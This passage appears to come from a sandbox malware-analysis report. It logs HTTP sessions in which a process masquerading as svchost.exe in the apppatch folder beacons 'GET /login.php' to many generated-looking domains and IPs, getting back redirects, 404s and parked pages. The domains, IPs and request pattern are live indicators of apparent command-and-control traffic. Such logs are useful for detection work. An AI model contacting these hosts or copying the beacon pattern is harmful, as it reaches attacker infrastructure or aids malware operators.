Nov 11, 2024 18:08:05.190869093 CET | 976 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:05 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2fNvrjUU%2Bsp3ZXgf1nwQHIZ9F4eNXGXblHbPrtWgrQdDv6lCyT78S8qI1X7ahOkVLK0VFj%2BdbTqufP0eQvMPQ7AVEIQUMIRkZTvYeyvPzq7IFZNmRKgjbaSHwr5jA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1da1b91425c-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1948&recv_bytes=729&delivery_rate=3271084&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:08:07.054352045 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
Nov 11, 2024 18:08:07.387156010 CET | 973 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:07 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EN0QkG7BTTqmpZRz6d2sdBpUhFKaJWytuZkrMtV9EZkIIppTY3O3d9trgm1vi4Fidrqt%2F5TcIpLPSgh1FG6HzazrjLaxG4uLT1aRCANBKsnXak0m3i58IujsHkmVWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1e86e6e425c-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1178&sent=11&recv=13&lost=0&retrans=0&sent_bytes=2924&recv_bytes=972&delivery_rate=3271084&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 56912 | 3.94.10.34 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:42.663829088 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lygynud.com
Nov 11, 2024 18:07:43.092955112 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:43 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=afe1d12b60746e0899399294d35ad7c2|66.23.206.109|1731344863|1731344863|0|1|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 56913 | 18.208.156.248 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:42.673729897 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: pupycag.com
Nov 11, 2024 18:07:43.096957922 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:43 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=3079995e65d71de93ec0f852c88d2c35|66.23.206.109|1731344863|1731344863|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 56915 | 103.150.10.48 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:42.723053932 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
Nov 11, 2024 18:07:43.506666899 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:43 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:07:44.298877001 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
Nov 11, 2024 18:07:44.573286057 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:44 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:08:04.760523081 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
Nov 11, 2024 18:08:05.043391943 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:04 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:08:05.470715046 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
Nov 11, 2024 18:08:05.776349068 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:05 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 56923 | 106.15.232.163 | 8000 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:43.518893003 CET | 290 | OUT | GET /dh/147287063_134827.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 106.15.232.163:8000
                                                                                                                                                                                                            Connection: Keep-Alive
Nov 11, 2024 18:07:44.297677040 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:44 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:07:44.574848890 CET | 290 | OUT | GET /dh/147287063_134827.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 106.15.232.163:8000
                                                                                                                                                                                                            Connection: Keep-Alive
Nov 11, 2024 18:07:44.866720915 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:44 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:08:05.129179955 CET | 290 | OUT | GET /dh/147287063_134827.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 106.15.232.163:8000
                                                                                                                                                                                                            Connection: Keep-Alive
Nov 11, 2024 18:08:05.397111893 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:05 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:08:05.778120995 CET | 290 | OUT | GET /dh/147287063_134827.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 106.15.232.163:8000
                                                                                                                                                                                                            Connection: Keep-Alive
Nov 11, 2024 18:08:06.049734116 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:05 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 56960 | 76.223.67.189 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:47.905108929 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qexyhuv.com
Nov 11, 2024 18:07:48.335303068 CET | 259 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:48 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 114
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.9 | 56961 | 64.225.91.73 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:47.970525980 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galynuh.com
Nov 11, 2024 18:07:48.525259018 CET | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:48 GMT
                                                                                                                                                                                                            content-type: text/html
                                                                                                                                                                                                            content-length: 593
                                                                                                                                                                                                            last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                            etag: "63f68860-251"
                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                            Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.9 | 56964 | 103.224.212.210 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:48.088905096 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyxynyx.com
Nov 11, 2024 18:07:48.649300098 CET | 340 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:48 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            set-cookie: __tad=1731344868.1489616; expires=Thu, 09-Nov-2034 17:07:48 GMT; Max-Age=315360000
                                                                                                                                                                                                            location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0407-4879-ab0a-fce34aca034a
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.9 | 56965 | 44.221.84.105 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:48.115242004 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyciz.com
Nov 11, 2024 18:07:48.542262077 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:48 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f5ece37355d8c227499bb52001d4f4bb|66.23.206.109|1731344868|1731344868|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.9 | 56966 | 154.85.183.50 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:48.191951990 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
Nov 11, 2024 18:07:49.011537075 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:48 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:07:49.105601072 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
Nov 11, 2024 18:07:49.390928030 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:49 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:08:09.393544912 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
Nov 11, 2024 18:08:09.679491043 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:09 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:08:09.680655003 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
Nov 11, 2024 18:08:09.966717005 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:09 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.9 | 56967 | 103.224.182.252 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:48.236875057 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vofycot.com
Nov 11, 2024 18:07:48.799997091 CET | 338 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:48 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            set-cookie: __tad=1731344868.1504633; expires=Thu, 09-Nov-2034 17:07:48 GMT; Max-Age=315360000
                                                                                                                                                                                                            location: http://ww16.vofycot.com/login.php?sub1=20241112-0407-4817-b30f-e9d3a3931519
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.9 | 56976 | 64.190.63.136 | 80 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:07:49.433974028 CET | 348 | OUT | GET /login.php?sub1=20241112-0407-4817-b30f-e9d3a3931519 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww16.vofycot.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1731344868.1504633
Nov 11, 2024 18:07:50.115219116 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:50 GMT
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            transfer-encoding: chunked
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0FAmRW/Ag0BMutawvMN5/7T4vliKs+oYUVMd+Y55OnVzCkefKmzxOe8RFFzyuxXN6lNGB+yXV2H6NbLg+OVM3w==
                                                                                                                                                                                                            last-modified: Mon, 11 Nov 2024 17:07:49 GMT
                                                                                                                                                                                                            x-cache-miss-from: parking-7596689c44-ptvfg
                                                                                                                                                                                                            server: Parking/1.0
